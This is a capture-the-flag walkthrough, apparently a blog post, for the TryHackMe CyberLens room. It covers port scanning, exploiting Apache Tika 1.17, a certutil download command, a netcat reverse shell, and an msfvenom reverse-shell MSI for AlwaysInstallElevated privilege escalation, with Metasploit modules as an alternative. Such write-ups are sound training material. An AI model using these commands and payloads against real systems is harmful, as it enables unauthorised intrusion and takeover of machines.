Introduction

Detailed walkthrough for CyberLens CTF challenges on TryHackMe .

Tools Used

rustscan, ping, burpsuite, nc, metasploit, msfvenom.

Enumeration

Lets start the process by mapping host-name to target IP address.

mapping cyberlens.thm to the target IP address

When any user or application on the system tries to access cyberlens.thm, it will be directed to the IP address specified in the /etc/hosts file. Lets use rustscan for port scanning the target domain. Rustscan is tool to scan the network ports faster.

rustscan -a cyberlens.thm -- -sC -sV
# -a - IPs, or hosts to be scanned
# -- -sC -sV - this command adds -sC -sV automatically to nmap 
#[Eg: nmap -sC -sV cyberlens.thm] 
rustscan of cyberlens.thm

Found 16 open ports on the initial scan of posts using rustscan. Lets wait for executing nmap -sC -sV cyberlens.thm scan.

scan result of nmap -sC -sV cyberlens.thm

We got service and default script scan results of the host. Found multiple open ports. Lets start with web service, which is running in port 80 and port 61777. We have also confirmed that the target machine is running Windows OS from the above results.

cyberlens.thm

This is the website to extract the metadata of the images. Lets try using its functionality.

metadata result

Lets capture its functionality using Burp-suite.

Burp-suite capture

By checking the burp-suite we know that its connecting to port 61777 to get the meta data of the image.

cyberlens.thm:61777

Exploitation

Apache Tika 1.17 Server is running in port 61777. Lets make a search about the server.

search Apache Tika 1.17 Server

Found an interesting git result, where there is detailed information about the vulnerability and its POC in Apache Tika 1.17 Server. Lets use this git page to exploit the vulnerability.

Let’s test the python script from the git by uploading it.

python -m http.server <port>
# -m <module_name> - python module to be used
python http.server lin tening in port 9037
certutil -urlcache -f <file_url> <output_file_name>
# command to download a file from internet in Windows
running exploit.py python script

When we try to download a file exploit.py using the script from git, it was successfully downloaded in the target machine. Lets use this for the reverse shell.

Getting reverse shell

Uploading nc.exe and got reverse shell from it. And we are now logged in as user cyberlens in the target machine.

flag 1

We got flag 1.

Privilege Escalation

Lets start enumerate the system for privilege escalation vector using winPEASx64.exe .

executing winPEASx64.exe

Found an interesting result.

AlwaysInstallElevated Privilege Escalation vector

Lets check about it in internet.

about AlwaysInstallElevated

Found an interesting page where we get information about AlwaysInstallElevated. If .msi file is executed, it will be running with administrator privilege.

Lets create a .msi file to get reverse shell with elevated Privileges.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<local_ip> lport=<local_port> -a x64 --platform windows -f msi -o payload.msi 
# -p - payload to use
# -a - The architecture to useitecture
# --platform - The platform of the payload
# -f - Output format
# -o - Save the payload as

Lets generate and upload the payload to get reverse shell.

getting reverse shell with elevated privs

We have generated .msi file using msfvenom, uploaded and executed to get reverse shell as user nt authority\system.

flag 2

We got flag 2.

Alternate Solution using Metasploit

We know that vulnerable web application running apache tika. lets search it.

Exploit using Metasploit

Using the module exploit/windows/http/apache_tika_jp2_jscript, setting rhosts, rport, lhost and running the module. We confirmed that the target is vulnerable and exploitable.

getting meterpreter as CyberLens

We got the meterpreter session for the payload. Making this session to background using background command to proceed further.

Privilege Escalation using Metasploit

Searching AlwaysInstallElevated for privilege escalation in metasploit and got a result windows/local/always_install_elevated.

Setting session, rhosts, rport, lhost and running the module. We got a new session as user NT AUTHORITY\SYSTEM, which is highest privilege user in windows.

Finally we have completed the room Cyberlens.

Happy Hacking!!!